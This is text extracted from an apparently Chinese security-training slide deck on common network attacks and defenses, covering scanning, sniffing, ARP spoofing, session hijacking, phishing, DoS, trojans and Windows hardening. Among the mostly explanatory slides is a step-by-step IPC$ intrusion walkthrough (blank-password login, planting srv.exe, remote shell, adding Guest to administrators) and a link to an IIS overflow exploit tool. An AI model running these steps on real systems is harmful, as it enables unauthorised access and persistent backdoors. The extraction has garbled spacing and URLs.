绿盟常见网络攻击与防范.ppt
《绿盟常见网络攻击与防范.ppt》由会员分享,可在线阅读,更多相关《绿盟常见网络攻击与防范.ppt(77页珍藏版)》请在冰点文库上搜索。
常见网络攻击与防范,提纲,常见的网络攻击方法常用的安全防范措施,常见的网络攻击方法,1980,1985,1990,1995,2000,密码猜测,可自动复制的代码,密码破解,利用已知的漏洞,破坏审计系统,后门,会话劫持,擦除痕迹,嗅探,包欺骗,GUI远程控制,自动探测扫描,拒绝服务,www攻击,工具,攻击者,入侵者水平,攻击手法,半开放隐蔽扫描,控制台入侵,检测网络管理,DDOS攻击,2002,高,入侵技术的发展,采用漏洞扫描工具,选择会用的方式入侵,获取系统一定权限,提升为最高权限,安装系统后门,获取敏感信息或者其他攻击目的,入侵系统的常用步骤,端口判断,判断系统,选择最简方式入侵,分析可能有漏洞的服务,获取系统一定权限,提升为最高权限,安装多个系统后门,清除入侵脚印,攻击其他系统,获取敏感信息,作为其他用途,较高明的入侵步骤,2001年中美黑客大战,事件背景和经过4.1撞机事件为导火线4月初,以PoizonB0x、pr0phet为代表的美国黑客组织对国内站点进行攻击,约300个左右的站点页面被修改4月下旬,国内红(黑)客组织或个人,开始对美国网站进行小规模的攻击行动,4月26日有人发表了“五一卫国网战”战前声明,宣布将在5月1日至8日,对美国网站进行大规模的攻击行动。
各方都得到第三方支援各大媒体纷纷报道,评论,中旬结束大战,PoizonB0x、pr0phet更改的网页,中经网数据有限公司,中国科学院心理研究所,国内某政府网站,国内某大型商业网站,国内黑客组织更改的网站页面,美国劳工部网站,美国某节点网站,美国某大型商业网站,美国某政府网站,这次事件中采用的常用攻击手法,红客联盟负责人在5月9日网上记者新闻发布会上对此次攻击事件的技术背景说明如下:
“我们更多的是一种不满情绪的发泄,大家也可以看到被攻破的都是一些小站,大部分都是NT/Win2000系统,这个行动在技术上是没有任何炫耀和炒作的价值的。
”主要采用当时流行的系统漏洞进行攻击,这次事件中被利用的典型漏洞,用户名泄漏,缺省安装的系统用户名和密码Unicode编码可穿越firewall,执行黑客指令ASP源代码泄露可远程连接的数据库用户名和密码SQLserver缺省安装微软Windows2000登录验证机制可被绕过Bind远程溢出,Lion蠕虫SUNrpc.sadmind远程溢出,sadmin/IIS蠕虫Wu-Ftpd格式字符串错误远程安全漏洞拒绝服务(syn-flood,ping),这次事件中被利用的典型漏洞,用户名泄漏,缺省安装的系统用户名和密码,入侵者,利用黑客工具扫描系统用户,获得用户名和简单密码,这次事件中被利用的典型漏洞,Windows2000登录验证机制可被绕过,常见的安全攻击方法,直接获取口令进入系统:
网络监听,暴力破解利用系统自身安全漏洞特洛伊木马程序:
伪装成工具程序或者游戏等诱使用户打开或下载,然后使用户在无意中激活,导致系统后门被安装WWW欺骗:
诱使用户访问纂改过的网页电子邮件攻击:
邮件炸弹、邮件欺骗网络监听:
获取明文传输的敏感信息通过一个节点来攻击其他节点:
攻击者控制一台主机后,经常通过IP欺骗或者主机信任关系来攻击其他节点以隐蔽其入侵路径和擦除攻击证据拒绝服务攻击和分布式拒绝服务攻击(D.o.S和D.D.o.S),IP地址、主机是否运行、到要入侵点的路由、主机操作系统与用户信息等。
获取信息,1.收集主机信息,Ping命令判断计算机是否开着,或者数据包发送到返回需要多少时间Tracert/Tracerout命令跟踪从一台计算机到另外一台计算机所走的路径Finger和Rusers命令收集用户信息Host或者Nslookup命令,结合Whois和Finger命令获取主机、操作系统和用户等信息,应用的方法:
获取网络服务的端口作为入侵通道。
2.端口扫瞄,1.TCPConnect()2.TCPSYN3.TCPFIN4.IP段扫瞄5.TCP反向Ident扫瞄6.FTP代理扫瞄7.UDPICMP不到达扫瞄,7种扫瞄类型:
NSS(网络安全扫描器),可执行Sendmail、匿名FTP、NFS出口、TFTP、Host.equiv和Xhost等常规检查。
Strobe(超级优化TCP端口检测程序),可记录指定机器上的所有开放端口,快速识别指定机器上运行的服务,提示可以被攻击的服务。
SATAN(安全管理员的网络分析工具),SATAN用于扫描远程主机,发现漏洞,包括FTPD漏洞和可写的FTP目录,NFS漏洞、NIS漏洞、RSH漏洞、Sendmail和X服务器漏洞等。
Jakal扫描器,可启动而不完成TCP连接,因此可以扫描一个区域而不留下痕迹。
IdengTCPscan扫描器,可识别指定TCP端口的进程的UID。
扫瞄软件举例:
3.Sniffer扫瞄,原理:
sniffer类的软件能把本地网卡设置成工作在“混杂”(promiscuous)方式,使该网卡能接收所有数据帧,从而获取别人的口令、金融帐号或其他敏感机密信息等。
方法与对策:
1、用交换机替换HUB,交换机是两两接通,比普通HUB安全。
2、使用检测的软件,如CPMAntisniff等,检测网络中是否有网卡工作在混杂状态(基本原理是发送本网中并不存在的MAC地址,看看是否有回应,如有回应,则说明有计算机网卡工作在混杂模式。
)。
一次利用ipc$的入侵过程,1.C:
netusex.x.x.xIPC$“”/user:
“admintitrators”用流光扫到的用户名是administrators,密码为“空”的IP地址2.C:
copysrv.exex.x.x.xadmin$先复制srv.exe上去,在流光的Tools目录下3.C:
nettimex.x.x.x查查时间,发现x.x.x.x的当前时间是2003/3/19上午11:
00,命令成功完成。
4.C:
atx.x.x.x11:
05srv.exe用at命令启动srv.exe吧(这里设置的时间要比主机时间推后)5.C:
nettimex.x.x.x再查查时间到了没有,如果x.x.x.x的当前时间是2003/3/19上午11:
05,那就准备开始下面的命令。
6.C:
telnetx.x.x.x99这里会用到Telnet命令吧,注意端口是99。
Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!
所以我们打算建立一个Telnet服务!
这就要用到ntlm了,一次利用ipc$的入侵过程,7.C:
copyntlm.exe127.0.0.1admin$ntlm.exe也在流光的Tools目录中8.C:
WINNTsystem32ntlm输入ntlm启动(这里的C:
WINNTsystem32是在对方计算机上运行当出现“DONE”的时候,就说明已经启动正常。
然后使用“netstarttelnet”来开启Telnet服务)9.Telnetx.x.x.x,接着输入用户名与密码就进入对方了为了方便日后登陆,将guest激活并加到管理组10.C:
netuserguest/active:
yes11.C:
netuserguest1234将Guest的密码改为123412.C:
netlocalgroupadministratorsguest/add将Guest变为Administrator,网络监听及防范技术,网络窃听是指通过截获他人网络上通信的数据流,并非法从中提取重要信息的一种方法间接性利用现有网络协议的一些漏洞来实现,不直接对受害主机系统的整体性进行任何操作或破坏隐蔽性网络窃听只对受害主机发出的数据流进行操作,不与主机交换信息,也不影响受害主机的正常通信,网络监听及防范技术共享式局域网下,共享式局域网采用的是广播信道,每一台主机所发出的帧都会被全网内所有主机接收到一般网卡具有以下四种工作模式:
广播模式、多播模式、直接模式和混杂模式网卡的缺省工作模式是广播模式和直接模式,即只接收发给自己的和广播的帧,网络监听及防范技术共享式局域网下,使用MAC地址来确定数据包的流向若等于自己的MAC地址或是广播MAC地址,则提交给上层处理程序,否则丢弃此数据当网卡工作于混杂模式的时候,它不做任何判断,直接将接收到的所有帧提交给上层处理程序共享式网络下窃听就使用网卡的混杂模式,网络监听及防范技术共享式局域网下,网络监听及防范技术交换式局域网下,在数据链路层,数据帧的目的地址是以网卡的MAC地址来标识ARP协议实现的配对寻址ARP请求包是以广播的形式发出,正常情况下只有正确IP地址与的主机才会发出ARP响应包,告知查询主机自己的MAC地址。
局域网中每台主机都维护着一张ARP表,其中存放着地址对。
网络监听及防范技术交换式局域网下,ARP改向的中间人窃听,A发往B:
(MACb,MACa,PROTOCOL,DATA)B发往A:
(MACa,MACb,PROTOCOL,DATA),A发往B:
(MACx,MACa,PROTOCOL,DATA)B发往A:
(MACx,MACb,PROTOCOL,DATA),网络监听及防范技术交换式局域网下,X分别向A和B发送ARP包,促使其修改ARP表主机A的ARP表中B为主机B的ARP表中A为X成为主机A和主机B之间的“中间人”,网络监听及防范技术网络窃听的被动防范,分割网段细化网络会使得局域网中被窃听的可能性减小使用静态ARP表手工输入地址对采用第三层交换方式取消局域网对MAC地址、ARP协议的依赖,而采用基于IP地址的交换加密SSH、SSL、IPSec,网络监听及防范技术网络窃听的主动防范,共享式局域网下的主动防范措施伪造数据包构造一个含有正确目标IP地址和一个不存在目标MAC地址各个操作系统处理方式不同,一个比较好的MAC地址是FF-FF-FF-FF-FF-FE性能分析向网络上发送大量包含无效MAC地址的数据包,窃听主机会因处理大量信息而导致性能下降,网络监听及防范技术网络窃听的主动防范,交换式局域网下的主动防范措施监听ARP数据包监听通过交换机或者网关的所有ARP数据包,与预先建立的数据库相比较定期探测数据包传送路径使用路径探测程序如tracert、traceroute等对发出数据包所经过的路径进行检查,并与备份的合法路径作比较使用SNMP定期轮询ARP表,IP欺骗及防范技术会话劫持,一般欺骗,会话劫持,IP欺骗及防范技术会话劫持,会话劫持攻击的基本步骤发现攻击目标确认动态会话猜测序列号关键一步,技术难点使被冒充主机下线伪造FIN包,拒绝服务攻击接管会话,IP欺骗及防范技术会话劫持,猜测序列号TCP区分正确数据包和错误数据包仅通过它们的SEQ/ACK序列号选择恰当时间,在数据流中插入一个欺骗包,服务器将接受这个包,并且更新ACK序列号;然而客户主机仍继续使用老的SEQ序列号,而没有察觉我们的欺骗包,IP欺骗及防范技术防范技术,没有有效的办法可以从根本上防范会话劫持攻击所有会话都加密保护实现困难使用安全协议(SSH、VPN)保护敏感会话对网络数据流采取限制保护措施被动措施,电子邮件欺骗及防范技术案例,2003年6月初,一些在中国工商银行进行过网上银行注册的客户,收到了一封来自网络管理员的电子邮件,宣称由于网络银行系统升级,要求客户重新填写用户名和密码。
这一举动随后被工行工作人员发现,经证实是不法分子冒用网站公开信箱,企图窃取客户的资料。
虽然没有造成多大的损失,但是这宗典型的电子邮件欺骗案例当时曾在国内安全界和金融界掀起了轩然大波,刺激人们针对信息安全问题展开了更加深切的讨论。
电子邮件欺骗及防范技术原理,发送邮件使用SMTP(即简单邮件传输协议)SMTP协议的致命缺陷:
过于信任原则SMTP假设的依据是:
不怀疑邮件的使用者的身份和意图伪装成为他人身份向受害者发送邮件可以使用电子邮件客户端软件,也可以远程登录到25端口发送欺骗邮件,电子邮件欺骗及防范技术防范,查看电子邮件头部信息不仅指出了是否有人欺骗了电子邮件,而且指出了这个信息的来源采用SMTP身份验证机制使用与POP协议收取邮件时相同的用户名/密码PGP邮件加密以公钥密码学(PublicKeyCryptology)为基础的,Web欺骗及防范技术概念,人们利用计算机系统完成具有安全需求的决策时往往是基于屏幕的显示页面、URL图标、图片时间的先后顺序攻击者创造一个完整的令人信服的Web世界,但实际上它却是一个虚假的复制攻击者控制这个虚假的Web站点,受害者浏览器和Web之间所有网络通信完全被攻击者截获,Web欺骗及防范技术概念,Web欺骗及防范技术原理,URL地址改写http:
/http:
/http:
/:
/,Web欺骗及防范技术原理,欺骗过程用户单击经过改写后的http:
/,Web欺骗及防范技术原理,隐藏纰漏由于JavaScript能够对连接状态栏写操作,而且可以将JavaScript操作与特定事件绑定在一起。
攻击者完全可以将改写的URL状态恢复为改写前的状态。
JavaScript、ActiveX等技术使Web欺骗变得更为可信。
Web欺骗及防范技术防范技术,检查页面的源代码禁用JavaScrip、ActiveX等脚本语言确保应用有效和能适当地跟踪用户会话ID使用尽可能长的随机数教育是非常重要的,口令攻击,方法与对策:
1、限制同一用户的失败登录次数2、限制口令最短长度,要求特权指令使用复杂的字母、数字组合。
3、定期更换口令,不要将口令存放到计算机文件中,1口令暴力攻击:
生成口令字典,通过程序试探口令。
2窃取口令文件后解密:
窃取口令文件(UNIX环境下的Passwd文件和Shadow文件),通过软件解密。
CGI漏洞攻击,原理:
1.有些CGI程序只是简单地进行传递,不对内容进行过滤,攻击者就可能通过页面提交带有危险指令的脚本代码提交给机器去执行。
2.有些CGI能够过滤一些特征数据,但是有些攻击者故意制作一些混乱的字符串骗过检测(如使用退格字符)。
3.有些管理员把CGI所在的目录设置为可写的,那么攻击者不仅可以修改替换页面,而且也可以通过新脚本为所欲为。
对策:
严格设置CGI脚本权限,采用安全的CGI。
漏洞攻击,FTP漏洞攻击,漏洞1:
对使用的端口号没有任何限制,可以使用TCP提供给其他服务的任意端口,这就使攻击者利用FTP攻击其他服务。
FTP服务器被当作攻击武器使用了。
防范措施是设置服务器最好不要建立端口号在1024以下的连接,其次禁止FTP代理。
漏洞2:
FTP标准允许无限次输入密码。
防范措施是建议服务器限制尝试输入正确指令的次数,另外在一次登录失败后应暂停几秒来削减暴力攻击的有效性。
漏洞3:
分配端口号时,通常按增序分配。
防范措施是让系统改为使用随机分配端口号的方法。
缓冲区溢出攻击,在c语言中,下面程序将造成缓冲区溢出:
charbuffer10;strcpy(buffer,str);或者Sprintf(buffer,”thisisatest.”);后果:
普通的缓冲区溢出并不会产生安全问题,只有将溢出送到能够以root权限运行命令的区域才会产生危害,最常见的方法是在溢出区域运行一个shell,再通过shell执行其他的命令。
对策:
经常注意升级版本或下载补丁。
例如:
IISISAPI.Printer的缓冲区溢出攻击软件:
http:
/http:
/www.sunx.org/mysoft/iishack.zip补丁:
http:
/,拒绝服务攻击(DoS),拒绝服务攻击,利用系统缺陷攻击OOB攻击耗尽连接攻击利用放大原理Smurf攻击利用放大系统攻击分布式拒绝服务攻击DDoS,1.OOB攻击(OutofBand)原理:
攻击者是利用Windows下微软网络协定NetBIOS的一个例外处理程序OOB(OutofBand)的漏洞。
只要有人以OOB的方式,通过TCP/IP传递一个小小的包到某个IP地址的某个开放的受端上(一般为139)。
对象:
使没有防护或修订的win95/nt系统瞬间当机。
工具:
Ssping、Teardrop(泪滴)、Trin00、Targe3,这些攻击都是利用系统的漏洞,因此补救的办法是升级或下载补丁,对策,2.耗尽连接攻读LAND攻击:
向被攻击者发送一个个源地址和目标地址都被设置成为被攻击者的地址的SYN包,导致被攻击者自己与自己建立一个空连接,直到超时。
TCP/SYN攻击:
攻击者向目标主机不断发送带有虚假源地址的SYN包,目标主机发送ACK/SYN回应,因为源地址是虚假的,所以不会收到ACK回应,导致耗费大量资源等待ACK上,直止系统资源耗尽。
这些攻击都是利用系统的漏洞,因此补救的办法是升级或下载补丁,对策,Smurf攻击,攻击者用广播的方式发送回复地址为受害者地址的ICMP请求数据包,每个收到这个数据包的主机都进行回应,大量的回复数据包发给受害者,导致受害主机崩溃。
Smurf攻击原理,利用放大系统攻击,某些类型的操作系统,在一定情况下,对一个请求所返回的信息比请求信息量大几十倍(如Macintosh),攻击者伪装成目标主机进行请求,导致大量数据流发向目标主机,加重了攻击效果。
DoS攻击技术DDoS技术,分布式拒绝服务攻击,攻击者在客户端通过telnet之类的常用连接软件,向(master)主控端发送发送对目标主机的攻击请求命令。
主控端(master)侦听接收攻击命令,并把攻击命令传到分布端,分布端是执行攻击的角色,收到命令立即发起flood攻击。
DDoS攻击原理,特洛伊木马,木马不同于病毒,但经常被视作病毒处理,随计算机自动启动并在某一端口进行侦听;木马的实质只是一个通过端口进行通信的网络客户/服务程序特洛伊木马的种类远程控制型输出shell型信息窃取型其它类型,Netbus客户端程序,NetBus传输,NetBus使用TCP建立会话。
缺省情况下用12345端口进行连接,12346端口进行数据传输跟踪NetBus的活动比较困难。
可以通过检查12346端口数据来确定许多类似的程序使用固定的端口,你可以扫描整个的网络监测可疑的活动。
简单方法netstat-an,反弹型特洛伊木马,可穿透防火墙,控制局域网机器服务器端主动发起连接,控制端监听80端口自动上线通知Email发送读取主页空间的某个文件网络神偷、灰鸽子、魔法控制解决方法安装防病毒软件和个人防火墙检查可疑的进程和监听端口提高安全警惕性,TCP/IP的每个层次都存在攻击,混合型、自动的攻击,WorkstationViaEmail,Workstation,Internet,混合型攻击:
蠕虫,Workstation,攻击的发展趋势,攻击的发展趋势,漏洞趋势严重程度中等或较高的漏洞急剧增加,新漏洞被利用越来越容易(大约60%不需或很少需用代码)混合型威胁趋势将病毒、蠕虫、特洛伊木马和恶意代码的特性与服务器和Internet漏洞结合起来而发起、传播和扩散的攻击,例:
红色代码和尼姆达等。
主动恶意代码趋势制造方法:
简单并工具化技术特征:
智能性、攻击性和多态性,采用加密、变换、插入等技术手段巧妙地伪装自身,躲避甚至攻击防御检测软件.表现形式:
多种多样,没有了固定的端口,没有了更多的连接,甚至发展到可以在网络的任何一层生根发芽,复制传播,难以检测。
受攻击未来领域即时消息:
MSN,Yahoo,ICQ,OICQ等对等程序(P2P)移动设备,常见的安全防范措施,常用的安全防范措施,物理层网络层路由交换策略VLAN划分防火墙、隔离网闸入侵检测抗拒绝服务传输加密系统层漏洞扫描系统安全加固SUS补丁安全管理应用层防病毒安全功能增强管理层独立的管理队伍统一的管理策略,常用的安全防护措施防火墙,入侵检测系统,Firewall,Servers,DMZ,Intranet,监控中心,router,攻击者,发现攻击,发现攻击,发现攻击,报警,报警,漏洞扫描系统,地方网管,监控中心,地方网管,地方网管,市场部,工程部,router,开发部,Servers,Firewall,漏洞扫描产品应用,系统安全加固,基本安全配置检测和优化密码系统安全检测和增强系统后门检测提供访问控制策略和工具增强远程维护的安全性文件系统完整性审计增强的系统日志分析系统升级与补丁安装,Windows系统安全加固,使用Windowsupdate安装最新补丁;更改密码长度最小值、密码最长存留期、密码最短存留期、帐号锁定计数器、帐户锁定时间、帐户锁定阀值,保障帐号以及口令的安全;卸载不需要的服务;将暂时不需要开放的服务停止;限制特定执行文件的权限;设置主机审核策略;调整事件日志的大小、覆盖策略;禁止匿名用户连接;删除主机管理共享;限制Guest用户权限;安装防病毒软件、及时更新病毒代码库;安装个人防火墙。
Windows系统安全加固,使用Windowsupdate安装最新补丁;更改密码长度最小值、密码最长存留期、密码最短存留期、帐号锁定计数器、帐户锁定时间、帐户锁定阀值,保障帐号以及口令的安全;将默认Administrator用户和组改名,禁用Guests并将Guest改名;开启安全审核策略;卸载不需要的服务;将暂时不需要开放的服务停止;限制特定执行文件的权限;调整事件日志的大小、覆盖策略;禁止匿名用户连接;删除主机管理共享;安装防病毒软件、个人防火墙。
优化注册表增强安全性,限制空连接HKEY_Local_MACHINESystemCurrentControlSetServicesLanManServerParameters键值:
RestrictNullSessAccess类型:
REG_DWORD数值:
1限制来宾和空登陆身份查看事件日志HKEY_Local_MACHINESystemCurrentControlSetServicesEventLogApplicationSecuritySystem键值:
RestrictGuestAccess类型:
REG_DWORD数值:
1,优化注册表增强安全性,限制服务器显示在网络列表中HKEY_Local_MACHINESystemCurrentControlSetServicesLanManServerParameters键值:
hidden类型:
REG_DWORD数值:
1审核备份还原时间HKEY_Local_MACHINESystemCurrentControlSetControlLsa键值:
FullPrivilegeAuditng类型:
REG_DWORD数值:
1,优化注册表增强安全性,不显示最后登陆名HKEY_Local_MACHINESoftwareMicrosoftWindowsNTCurrentVersionWinlogon键值:
DontDisplayLastUserName类型:
REG_SZ数值:
1限制匿名用户列举用户和共享信息HKEY_Local_MACHINESystemCurrentControlSetControlLsa键值:
RestrictAnonymous类型:
REG_DWORD数值:
1,优化注册表增强安全性,删除为管理员而设计的共享(C$,ADMIN$)键值:
AutoShareServer类型:
REG_DWORD数值:
1,